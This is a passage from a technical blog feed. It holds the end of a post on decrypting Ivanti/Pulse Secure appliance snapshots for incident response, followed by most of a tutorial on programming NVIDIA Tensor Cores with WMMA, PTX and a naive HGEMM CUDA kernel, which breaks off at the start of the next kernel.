        output_filename = <span class="hljs-string">'snapshot.tar'</span>
        <span class="hljs-keyword">with</span> open(output_filename, <span class="hljs-string">'wb'</span>) <span class="hljs-keyword">as</span> output_file:
            output_file.write(decrypted_data)
        print(<span class="hljs-string">'Decryption complete.'</span>)
</code></pre>
<p>This method has been tested to work on both the virtualized appliance and the physical appliance version of Pulse Secure/Ivanti Connect Secure. The decrypted file contains the following:</p>
<ul>
<li><p><code>ls</code> of all system folders</p>
</li>
<li><p>Supported filesystems and their status (e.g., ext3, vfat, nfs)</p>
</li>
<li><p>Device driver allocations for character and block devices (e.g., mem, sd, loop)</p>
</li>
<li><p>Memory usage, including total, free, and specific usage types (e.g., Buffers, Cached, Swap)</p>
</li>
<li><p>Slab allocator statistics, detailing kernel object caching</p>
</li>
<li><p>Swap space configuration</p>
</li>
<li><p>Mounted filesystems, detailing mount points and filesystem types</p>
</li>
<li><p>System load average over 1, 5, and 15 minutes</p>
</li>
<li><p>Network interface statistics, including received and transmitted packets</p>
</li>
<li><p>IP routing table</p>
</li>
<li><p>File lock information, showing locks held by processes</p>
</li>
<li><p>CPU condition and aggregated CPU time spent in various states</p>
</li>
<li><p>XFRM (IPsec) statistics</p>
</li>
<li><p>Netfilter queue configurations</p>
</li>
<li><p>Netlink socket details</p>
</li>
<li><p>IRQ (Interrupt Request) affinities for specific devices</p>
</li>
<li><p>cgroups configuration</p>
</li>
<li><p>and more... (i haven't read the full thing lol)</p>
</li>
</ul>
<p>You can use this data to figure out whether any added scripts or unauthorized processes were running inside your device at the time the system snapshot was taken. However, to match file hashes against known-good hashes, the appliance relies on a <code>manifest</code> file stored inside the appliance or shipped alongside the external ICT, which makes it impossible to verify whether components of the appliance were modified using the snapshot alone.</p>
<p>Still, in my experience this can be an easy and fast way to detect signs of compromise without having to physically connect to the appliance inside a cold server room. This can prove useful for deciding whether more direct action is needed to fully analyze the appliance.</p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>So what did we learn from all this? Probably that attackers are now shifting their focus to less secured devices in the perimeter of the network. Because of course an Endpoint EDR can only see indicators of compromise inside of an endpoint, it rarely can identify that it is connected to a compromised appliance.</p>
<p>And ultimately, all of this is just very hard. Cracking cryptographic functions, decrypting firmware, analyzing the Linux kernel: if you’re able to do all of that, you won’t settle for working in incident response. You would be working in vulnerability research to find zero days and easily make ten times more. The unfortunate truth is that so far there hasn’t really been an effective way to detect, analyze, and tackle these types of attacks.</p>
]]></content:encoded></item><item><title><![CDATA[Messing Around with GPUs Again]]></title><description><![CDATA[Cover Illustration by atomic_arctic

While doing matrixes on GPUs are kind of overplayed, they still represent one of the most important computation for modern AI workloads, making up the vast majority of FLOPS during both training and inference of d...]]></description><link>https://research.meekolab.com/messing-around-with-gpus-again</link><guid isPermaLink="true">https://research.meekolab.com/messing-around-with-gpus-again</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Mon, 16 Jun 2025 03:22:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1749543516317/7712c94a-7571-4cec-aa7c-dd6112997d9c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> atomic_arctic</p>
</blockquote>
<p>While matrix multiplications on GPUs are kind of overplayed, they still represent one of the most important computations for modern AI workloads, making up the vast majority of FLOPs during both training and inference of deep learning models. Even if your kernels don’t get near cuBLAS performance, writing them will still teach you a lot about low-level GPU architecture and its performance characteristics.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288261688/de451dd6-9902-4cfa-9941-510ab77c6275.png" alt class="image--center mx-auto" /></p>
<p>NVIDIA introduced Tensor Cores with the Volta generation of GPUs to accelerate AI inference and training, which typically involve large-scale matrix multiplication or matrix-multiplication-like workloads. CUDA Cores alone have limited computing power, and since matrix multiplication is a typical compute-intensive workload, a lot of memory bandwidth would sit unused while they work through the math. The addition of Tensor Cores allows GPUs to actually make use of their memory bandwidth of several hundred GB/s during matrix multiplication. Tensor Cores were later added to the RTX series of graphics cards, as AI workloads became more important for prosumers and gamers (technologies like DLSS and frame generation).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288745528/79a4314c-fda0-4729-aa8e-883557da9c88.png" alt class="image--center mx-auto" /></p>
<p>Each Streaming Multiprocessor (SM) in the Hopper architecture is a powerful compute unit containing both traditional CUDA cores and specialized Tensor Cores. In the full GH100 “Hopper” GPU (which powers H100), there are 144 SMs arranged across 8 GPCs (Graphics Processing Clusters), with 2 SMs per TPC (Texture Processing Cluster). The H100 SXM5 variant has 132 SMs enabled (the PCIe version has 114). <strong>Within each SM, there are 128 FP32 CUDA cores and four 4th-generation Tensor Cores</strong>. The CUDA cores handle standard scalar/thread-parallel operations (integer and floating-point ALU tasks), while the Tensor Cores are dedicated matrix-math units designed for massively parallel multiply-accumulate operations on matrices. These Tensor Cores are tightly integrated into the SM’s datapath and scheduling fabric, allowing warp-level matrix operations to execute alongside normal instructions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744288957613/5ce05b78-368e-4c05-b024-d7cfff86f322.png" alt class="image--center mx-auto" /></p>
<p>Hopper Tensor Cores support a broad range of numerical formats including FP64, TF32, BF16, FP16, INT8, and most notably FP8, a new 8-bit format with two variants (E4M3 and E5M2) tailored for AI workloads. These data types operate under mixed-precision accumulation, e.g., FP8 inputs accumulating in FP16 or FP32, balancing performance and accuracy. Hybrid-precision recipes are not new: <a target="_blank" href="https://arxiv.org/pdf/2209.05433"><strong>Micikevicius et al. (2022)</strong></a> use E4M3 in Fprop and E5M2 in Dgrad and Wgrad. Newer training setups like DeepSeek's adopt the E4M3 format universally. By scaling smaller groups of elements separately, their methodology effectively shares exponent bits among the grouped elements, mitigating the impact of the limited dynamic range.</p>
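<p>To make the two FP8 layouts a bit more concrete, here is a minimal host-side C++ sketch that decodes a raw FP8 byte into a float. The function names (<code>decode_fp8</code>, <code>decode_e4m3</code>, <code>decode_e5m2</code>) are made up for this example and are not part of any CUDA header. The special-value rules follow the conventions described in Micikevicius et al.: E5M2 behaves like a small IEEE float, while E4M3 gives up infinities to gain a bit more range.</p>
<pre><code class="lang-cpp">#include &lt;cassert&gt;
#include &lt;cmath&gt;
#include &lt;cstdint&gt;
#include &lt;limits&gt;

// Decode one FP8 byte laid out as [sign | exponent | mantissa].
// ieee_like = true  : E5M2 rules, the top exponent encodes Inf/NaN.
// ieee_like = false : E4M3 rules, no Inf and only S.1111.111 is NaN.
float decode_fp8(std::uint8_t bits, int exp_bits, int man_bits, bool ieee_like) {
    assert(exp_bits + man_bits == 7);
    const int bias    = (1 &lt;&lt; (exp_bits - 1)) - 1;
    const int exp_max = (1 &lt;&lt; exp_bits) - 1;
    const int man_max = (1 &lt;&lt; man_bits) - 1;
    const int exp = (bits &gt;&gt; man_bits) &amp; exp_max;
    const int man = bits &amp; man_max;
    const float sign = (bits &amp; 0x80) ? -1.0f : 1.0f;

    if (exp == exp_max) {
        if (ieee_like) {
            return man == 0 ? sign * std::numeric_limits&lt;float&gt;::infinity()
                            : std::numeric_limits&lt;float&gt;::quiet_NaN();
        }
        if (man == man_max) {
            return std::numeric_limits&lt;float&gt;::quiet_NaN();
        }
        // Otherwise E4M3 treats the top exponent as ordinary finite values.
    }
    if (exp == 0) {
        // Subnormal: no implicit leading 1.
        return sign * std::ldexp(static_cast&lt;float&gt;(man), 1 - bias - man_bits);
    }
    const float frac = 1.0f + static_cast&lt;float&gt;(man) / static_cast&lt;float&gt;(1 &lt;&lt; man_bits);
    return sign * std::ldexp(frac, exp - bias);
}

float decode_e4m3(std::uint8_t bits) { return decode_fp8(bits, 4, 3, false); }
float decode_e5m2(std::uint8_t bits) { return decode_fp8(bits, 5, 2, true); }
</code></pre>
<p>With these rules the largest finite E4M3 value is 448 (byte 0x7E) and the largest finite E5M2 value is 57344 (byte 0x7B). That gap in range is the reason E4M3 usually needs some form of scaling to be usable everywhere.</p>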
<p>Each Tensor Core executes matrix multiplications using warp-level HMMA instructions like <code>HMMA.16x8x16</code> or <code>HMMA.8x8x8</code>, where the suffix denotes the matrix tile size and the operand types follow. In Hopper, an SM can issue such operations to each of its four Tensor Cores independently. Pipelining and warp scheduling allow latency hiding and high occupancy, especially when paired with the low-latency data loads of the Tensor Memory Accelerator (TMA) and async barriers. This design minimizes idle cycles and register pressure while sustaining high throughput.</p>
<h1 id="heading-programming-tensor-cores">Programming Tensor Cores</h1>
<p>When you're writing Tensor Core code, you're really working with three different levels at once. The first is the C++ API that wraps everything in a nice clean abstraction, the next is the PTX instructions that give you precise control over what the hardware does, and the last is the actual SASS machine code that runs on the silicon.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738579948361/a4f6e1f0-f6b6-4ecf-a5ff-e9bef1e0ae4d.png" alt class="image--center mx-auto" /></p>
<p>At the top level, NVIDIA gives us the WMMA (Warp Matrix Multiply Accumulate) API in CUDA C++. It's defined in mma.h under your CUDA include directory (typically CUDA/v12.0/include/crt/mma.h). The basic building block here is something called a "fragment" - think of it as a chunk of a matrix that maps nicely to what the Tensor Cores can process. Each fragment represents a warp-collective operation where all 32 threads in a warp work together, each holding specific matrix elements in their registers.</p>
<pre><code class="lang-c"><span class="hljs-comment">// First we declare our fragments - these map to registers in a warp</span>
nvcuda::wmma::fragment&lt;nvcuda::wmma::matrix_a, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, nvcuda::wmma::row_major&gt; frag_a;
nvcuda::wmma::fragment&lt;nvcuda::wmma::matrix_b, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, nvcuda::wmma::row_major&gt; frag_b;
nvcuda::wmma::fragment&lt;nvcuda::wmma::accumulator, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half&gt; frag_c;

<span class="hljs-comment">// Initialize the accumulator fragment to zero</span>
nvcuda::wmma::fill_fragment(frag_c, <span class="hljs-number">0.0f</span>);

<span class="hljs-comment">// Load matrix data from memory into fragments</span>
nvcuda::wmma::load_matrix_sync(frag_a, ptrA, strideA);
nvcuda::wmma::load_matrix_sync(frag_b, ptrB, strideB);

<span class="hljs-comment">// Do the matrix multiply-accumulate</span>
nvcuda::wmma::mma_sync(frag_c, frag_a, frag_b, frag_c);

<span class="hljs-comment">// Store results back to memory</span>
nvcuda::wmma::store_matrix_sync(ptrC, frag_c, strideC, nvcuda::wmma::mem_row_major);
</code></pre>
<p>Those template parameters tell the compiler exactly what size of matrix operation we want. Through the WMMA API, FP16 and BF16 use 16x16x16 (plus the 32x8x16 and 8x32x16 variants) and TF32 uses 16x16x8. FP8 is not exposed through WMMA at all; it is reached through PTX, for example <code>mma</code> with the m16n8k32 shape or Hopper's warpgroup-level <code>wgmma</code>. The shapes available at the PTX level have evolved: Volta introduced m8n8k4, Turing added m16n8k8, Ampere brought m16n8k16 along with sparsity support, and the FP8 configurations arrived with the Ada and Hopper generation.</p>
<p>When we compile that C++ code, the journey begins with NVCC. First, your .cu file gets preprocessed using cl.exe on Windows or gcc on Linux, expanding macros and handling includes. This happens once for the device pass and once for the host pass, producing intermediate files such as .cpp1.ii and .cpp4.ii. Then cudafe++ analyzes the preprocessed code to separate device and host portions, generating .cudafe1.cpp for the host side. This separation is crucial - host code will be compiled by your normal C++ compiler, while device code needs special handling.</p>
<p>Now we enter the PTX phase. PTX is NVIDIA's intermediate representation - kind of like GPU assembly but not quite machine code yet. For those familiar with LLVM, PTX shares similarities with LLVM's Intermediate Representation (IR). While LLVM's project scope has expanded beyond its original "virtual machine" naming, its core concept of IR remains analogous to PTX. IR acts as a bridge between frontend programming languages and backend machine code, simplifying support for new languages and hardware targets while enabling cross-platform optimizations. PTX serves as NVIDIA's "CUDA IR," connecting high-level CUDA C++ code with low-level GPU SASS instructions. This abstraction allows NVIDIA to implement runtime optimizations via tools like NVRTC and generate device-agnostic code.</p>
<p>The cicc compiler takes our separated device code and generates PTX, using virtual architecture flags (like -arch compute_70) to determine what features are available. This creates a .ptx file containing instructions that are still somewhat readable but much closer to the hardware:</p>
<pre><code class="lang-c"><span class="hljs-comment">// FP8 (new in Hopper!)</span>
mma.sync.aligned.m16n8k32.row.col.f16.e4m3.e4m3.f16 d, a, b, c;  <span class="hljs-comment">// 4-bit exp, 3-bit mantissa</span>
mma.sync.aligned.m16n8k32.row.col.f16.e5m2.e5m2.f16 d, a, b, c;  <span class="hljs-comment">// 5-bit exp, 2-bit mantissa</span>

<span class="hljs-comment">// FP16</span>
mma.sync.aligned.m16n8k16.row.col.f16.f16.f16.f16 d, a, b, c;

<span class="hljs-comment">// TF32</span>
mma.sync.aligned.m16n8k8.row.col.f32.tf32.tf32.f32 d, a, b, c;
</code></pre>
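<p>Each part of these PTX instructions has meaning: 'sync' means the instruction waits for all threads in the warp before executing, 'aligned' means every thread in the warp must execute the same instruction, 'row' and 'col' give the layouts of the A and B operands, the shape (m16n8k16) defines matrix dimensions, and the data types specify the precision for each operand.</p>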
<p>The ldmatrix instruction is fascinating - it's way more flexible than the old wmma.load. Instead of being locked into loading data with a fixed stride, each participating thread supplies the shared memory address of one 8-element row, so the rows of a matrix can live anywhere. This is crucial for avoiding shared memory bank conflicts:</p>
<pre><code class="lang-c">ldmatrix.sync.aligned.m8n8.x4.shared.b16 {r0, r1, r2, r3}, [addr];
</code></pre>
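<p>As a rough illustration of why the row addresses matter, the host-side C++ sketch below counts how many distinct shared memory banks the eight 16-byte rows of one 8x8 <code>b16</code> matrix touch for a given row stride. It assumes the usual model of 32 banks that are 4 bytes wide, and <code>row_start_bank</code> and <code>banks_touched</code> are hypothetical helper names, not CUDA APIs.</p>
<pre><code class="lang-cpp">#include &lt;cassert&gt;
#include &lt;set&gt;

// Shared memory model assumed here: 32 banks, each 4 bytes wide.
constexpr int kBanks = 32;
constexpr int kBankBytes = 4;

// Bank holding the first element of `row` when rows are `stride_halves` apart.
int row_start_bank(int row, int stride_halves) {
    assert(row &gt;= 0 &amp;&amp; stride_halves &gt; 0);
    const int byte_offset = row * stride_halves * 2;  // 2 bytes per half
    return (byte_offset / kBankBytes) % kBanks;
}

// Number of distinct banks touched by the 8 rows (16 bytes each) of one
// 8x8 b16 matrix. A result of 32 means every bank is hit exactly once.
int banks_touched(int stride_halves) {
    std::set&lt;int&gt; banks;
    for (int row = 0; row &lt; 8; ++row) {
        const int first = row_start_bank(row, stride_halves);
        for (int word = 0; word &lt; 4; ++word) {  // 16 bytes = 4 bank words
            banks.insert((first + word) % kBanks);
        }
    }
    return static_cast&lt;int&gt;(banks.size());
}
</code></pre>
<p>In this model an unpadded stride of 64 halves puts all eight rows on the same four banks, while a stride of 72 halves (64 plus a padding of 8) spreads them over all 32 banks.</p>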
<p>Though CUDA developers may not directly interact with PTX, it plays a critical role under the hood. When compiling CUDA code with NVCC, .ptx files are generated during the device code compilation phase. These files represent the optimized intermediate code before final translation to SASS (the GPU's native instruction set). PTX also enables the magic of forward compatibility - code compiled today can run on future GPUs through JIT compilation.</p>
<p>The next step is where ptxas comes in. This assembler takes PTX and generates actual machine code (SASS) for specific GPU architectures, using physical architecture flags like -arch=sm_90. The output is a .cubin file containing binary code that can run directly on the target GPU.</p>
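<p>Finally, we get to what actually runs on the hardware: SASS instructions. On Hopper (compute capability 9.0), there are specialized HMMA (Half-precision Matrix Multiply-Accumulate) instructions for each data format. Treat the mnemonics below as schematic: the exact spelling depends on the architecture and toolkit version, so dump your own binary with <code>cuobjdump -sass</code> to see what your build produces:</p>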
<pre><code class="lang-c">HMMA<span class="hljs-number">.1616</span>.F16  <span class="hljs-comment">// for FP16/BF16</span>
HMMA<span class="hljs-number">.1632</span>.F8   <span class="hljs-comment">// for the new FP8 format</span>
HMMA<span class="hljs-number">.168</span>.F32   <span class="hljs-comment">// for TF32</span>
LDSM<span class="hljs-number">.16</span>.M88<span class="hljs-number">.4</span>  <span class="hljs-comment">// Load from Shared Memory for matrix operations</span>
</code></pre>
<p>What's cool is each encoding is tuned for its specific format. The FP8 instruction (HMMA.1632.F8) can process twice as much data per instruction because the numbers are half the size. Combined with the doubled per-SM Tensor Core rate, this is how Hopper achieves that 4x per-SM speedup for FP8 operations compared to FP16 on the previous generation.</p>
<p>The journey doesn't end with a single cubin file. fatbinary packages together multiple architecture versions (like sm_70, sm_80, sm_90 cubins) along with PTX code for forward compatibility, creating a .fatbin file. This gets embedded into your host executable, allowing the CUDA runtime to select the best version at runtime based on the actual GPU present. The host code, meanwhile, has been compiled by your regular C++ compiler and linked with CUDA runtime libraries. The final executable contains both host code and the embedded fatbinary, ready to run on a variety of GPU architectures.</p>
<p>For the fp16 type, the matrix load and matrix multiplication operations mentioned above are compiled into LDSM instructions and HMMA instructions. These SASS instructions directly map to the physical Tensor Core hardware units, with each SM containing multiple Tensor Cores that can execute these specialized matrix operations in parallel.</p>
<h1 id="heading-implementations">Implementations</h1>
<h2 id="heading-naive-kernel">Naive Kernel</h2>
<p>The baseline implementation uses the C++ WMMA API for Tensor Cores, with tiling parameters BM = 64, BN = 128, BK = 64, and 256 threads per block. This configuration gives different memory access patterns and a different computational balance than the more common BM = 128, BN = 256, BK = 32 approach.</p>
<pre><code class="lang-cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;cuda_fp16.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;mma.h&gt;</span></span>
<span class="hljs-keyword">using</span> <span class="hljs-keyword">namespace</span> nvcuda;

<span class="hljs-comment">// Assumed helper, not shown in the original listing: view 8 consecutive halves as one 16-byte float4</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> FLOAT4(value) (reinterpret_cast&lt;float4 *&gt;(&amp;(value))[0])</span>

<span class="hljs-comment">// Launch with 256 threads per block and a (ceil(N / BN), ceil(M / BM)) grid</span>
<span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_naive</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BM = <span class="hljs-number">64</span>;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BN = <span class="hljs-number">128</span>;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BK = <span class="hljs-number">64</span>;

    <span class="hljs-keyword">int</span> bx = blockIdx.x;
    <span class="hljs-keyword">int</span> by = blockIdx.y;
    <span class="hljs-keyword">int</span> tid = threadIdx.x;
    <span class="hljs-keyword">int</span> wid = tid &gt;&gt; <span class="hljs-number">5</span>;

    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> APAD = <span class="hljs-number">8</span>;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BPAD = <span class="hljs-number">8</span>;

    <span class="hljs-comment">// WMMA loads need 32-byte aligned pointers, so align the tiles explicitly</span>
    __shared__ __align__(<span class="hljs-number">32</span>) half s_a[BM][BK + APAD];
    __shared__ __align__(<span class="hljs-number">32</span>) half s_b[BK][BN + BPAD];

    <span class="hljs-comment">// 8 warps form a 2x4 grid over the 64x128 block tile, so each warp owns</span>
    <span class="hljs-comment">// a 32x32 output tile (2x2 fragments). BK = 64 gives 4 k-steps of 16.</span>
    wmma::fragment&lt;wmma::matrix_a, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half, wmma::row_major&gt; frag_a[<span class="hljs-number">4</span>][<span class="hljs-number">2</span>];
    wmma::fragment&lt;wmma::matrix_b, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half, wmma::row_major&gt; frag_b[<span class="hljs-number">4</span>][<span class="hljs-number">2</span>];
    wmma::fragment&lt;wmma::accumulator, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half&gt; frag_c[<span class="hljs-number">2</span>][<span class="hljs-number">2</span>];

    <span class="hljs-comment">// Initialize accumulator fragments to zero</span>
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
            wmma::fill_fragment(frag_c[i][j], <span class="hljs-number">0.0f</span>);
        }
    }

    <span class="hljs-comment">// Every load moves 8 halves (16 bytes).</span>
    <span class="hljs-comment">// A tile: 64 rows x 8 chunks, so each thread copies 2 consecutive rows</span>
    <span class="hljs-comment">// B tile: 64 rows x 16 chunks, so each thread copies 4 consecutive rows</span>
    <span class="hljs-keyword">int</span> load_a_smem_m = (tid / <span class="hljs-number">8</span>) * <span class="hljs-number">2</span>;
    <span class="hljs-keyword">int</span> load_a_smem_k = (tid % <span class="hljs-number">8</span>) * <span class="hljs-number">8</span>;
    <span class="hljs-keyword">int</span> load_b_smem_k = (tid / <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>;
    <span class="hljs-keyword">int</span> load_b_smem_n = (tid % <span class="hljs-number">16</span>) * <span class="hljs-number">8</span>;

    <span class="hljs-keyword">int</span> load_a_gmem_m = by * BM + load_a_smem_m;
    <span class="hljs-keyword">int</span> load_b_gmem_n = bx * BN + load_b_smem_n;

    <span class="hljs-keyword">int</span> load_a_gmem_addr = load_a_gmem_m * K + load_a_smem_k;
    <span class="hljs-keyword">int</span> load_b_gmem_addr = load_b_smem_k * N + load_b_gmem_n;

    <span class="hljs-comment">// Warp position inside the block tile, in units of 16x16 fragments</span>
    <span class="hljs-keyword">int</span> comp_c_frag_m = (wid / <span class="hljs-number">4</span>) * <span class="hljs-number">2</span>; <span class="hljs-comment">// first fragment row: 0 or 2</span>
    <span class="hljs-keyword">int</span> comp_c_frag_n = (wid % <span class="hljs-number">4</span>) * <span class="hljs-number">2</span>; <span class="hljs-comment">// first fragment column: 0, 2, 4 or 6</span>

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-comment">// Load A tile into shared memory (2 rows x 8 halves per thread)</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
            <span class="hljs-keyword">if</span> (load_a_gmem_m + i &lt; M) {
                FLOAT4(s_a[load_a_smem_m + i][load_a_smem_k]) =
                    FLOAT4(a[load_a_gmem_addr + i * K]);
            }
        }

        <span class="hljs-comment">// Load B tile into shared memory (4 rows x 8 halves per thread)</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
            <span class="hljs-keyword">if</span> (load_b_gmem_n &lt; N) {
                FLOAT4(s_b[load_b_smem_k + i][load_b_smem_n]) =
                    FLOAT4(b[load_b_gmem_addr + i * N]);
            }
        }

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        __syncthreads();

        <span class="hljs-comment">// Load matrix data from shared memory into Tensor Core fragments,</span>
        <span class="hljs-comment">// one pair of A and B fragments per k-step</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> k = <span class="hljs-number">0</span>; k &lt; <span class="hljs-number">4</span>; k++) {
            <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
                wmma::load_matrix_sync(frag_a[k][i],
                    &amp;s_a[(comp_c_frag_m + i) * <span class="hljs-number">16</span>][k * <span class="hljs-number">16</span>], BK + APAD);
                wmma::load_matrix_sync(frag_b[k][i],
                    &amp;s_b[k * <span class="hljs-number">16</span>][(comp_c_frag_n + i) * <span class="hljs-number">16</span>], BN + BPAD);
            }
        }

        <span class="hljs-comment">// Execute matrix multiply-accumulate operations over all 4 k-steps</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
            <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
                <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
                <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> k = <span class="hljs-number">0</span>; k &lt; <span class="hljs-number">4</span>; k++) {
                    wmma::mma_sync(frag_c[i][j], frag_a[k][i], frag_b[k][j], frag_c[i][j]);
                }
            }
        }

        __syncthreads();
    }

    <span class="hljs-comment">// Store results back to global memory</span>
    <span class="hljs-keyword">int</span> store_c_gmem_m = by * BM + (comp_c_frag_m * <span class="hljs-number">16</span>);
    <span class="hljs-keyword">int</span> store_c_gmem_n = bx * BN + (comp_c_frag_n * <span class="hljs-number">16</span>);

    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
            <span class="hljs-keyword">if</span> (store_c_gmem_m + i * <span class="hljs-number">16</span> &lt; M &amp;&amp; store_c_gmem_n + j * <span class="hljs-number">16</span> &lt; N) {
                wmma::store_matrix_sync(
                    &amp;c[(store_c_gmem_m + i * <span class="hljs-number">16</span>) * N + (store_c_gmem_n + j * <span class="hljs-number">16</span>)],
                    frag_c[i][j], N, wmma::mem_row_major);
            }
        }
    }
}
</code></pre>
<p>The kernel arranges its 8 warps as a 2×4 grid over the 64×128 block tile, so each warp owns a 2×2 grid of fragments (a 32×32 output tile) instead of the 4×4 grid used with the 128×256 tiling. Because BK = 64 spans four 16-wide k-steps, every warp loads four pairs of A and B fragments per iteration and walks through all of them in the multiply-accumulate loop. For the global-to-shared copy, each thread moves two 16-byte chunks of A and four of B, which covers both tiles exactly once. Finally, the guards skip loads and stores that start outside the matrices, so M and N only need to be multiples of 16, while K still has to be a multiple of BK.</p>
<p>The increased BK dimension (64 vs 32) halves the number of iterations in the main loop, which means fewer synchronization points per output tile, at the expense of requiring more shared memory per iteration. This tradeoff can be beneficial depending on the matrix dimensions and hardware characteristics.</p>
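<p>To put rough numbers on that tradeoff, here is a small host-side C++ sketch that computes the shared memory footprint and the main-loop trip count for a given tiling. The <code>Tiling</code> struct and both function names are invented for this example; the fields simply mirror the constants used in the kernel.</p>
<pre><code class="lang-cpp">#include &lt;cassert&gt;
#include &lt;cstddef&gt;

// Tiling parameters, named after the constants in the kernel.
struct Tiling {
    int BM, BN, BK;
    int APAD, BPAD;
};

// Bytes of shared memory for one A tile [BM][BK + APAD] plus one B tile
// [BK][BN + BPAD], both stored as 2-byte halves.
std::size_t smem_bytes(const Tiling&amp; t) {
    assert(t.BM &gt; 0 &amp;&amp; t.BN &gt; 0 &amp;&amp; t.BK &gt; 0);
    const std::size_t a_halves = static_cast&lt;std::size_t&gt;(t.BM) * (t.BK + t.APAD);
    const std::size_t b_halves = static_cast&lt;std::size_t&gt;(t.BK) * (t.BN + t.BPAD);
    return 2 * (a_halves + b_halves);
}

// Number of main-loop iterations for a given K (K must divide evenly).
int main_loop_iters(const Tiling&amp; t, int K) {
    assert(K % t.BK == 0);
    return K / t.BK;
}
</code></pre>
<p>For BM = 64, BN = 128 and K = 4096, BK = 64 needs 26,624 bytes and 64 iterations, while BK = 32 needs 13,824 bytes and 128 iterations.</p>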
<h2 id="heading-asynchronous-copy-cpasync-and-pointer-conversions">Asynchronous Copy (cp.async) and Pointer Conversions</h2>
<p>The first significant optimization introduces asynchronous memory copy operations using PTX inline assembly. The key addition here is the use of <code>__cvta_generic_to_shared()</code> to convert generic pointers to shared memory addresses required by the PTX inline assembly.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744193507339/f463b971-9c16-4ff7-95b8-c1f587245776.png" alt class="image--center mx-auto" /></p>
<p>This is a critical step because a pointer to a shared memory array is a generic 8-byte pointer. Directly using this 8-byte value as a shared memory address <a target="_blank" href="https://forums.developer.nvidia.com/t/problem-about-ptx-instruction-cp-async-ca-shared-global/224219">may exceed the address range of shared memory</a>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_async</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
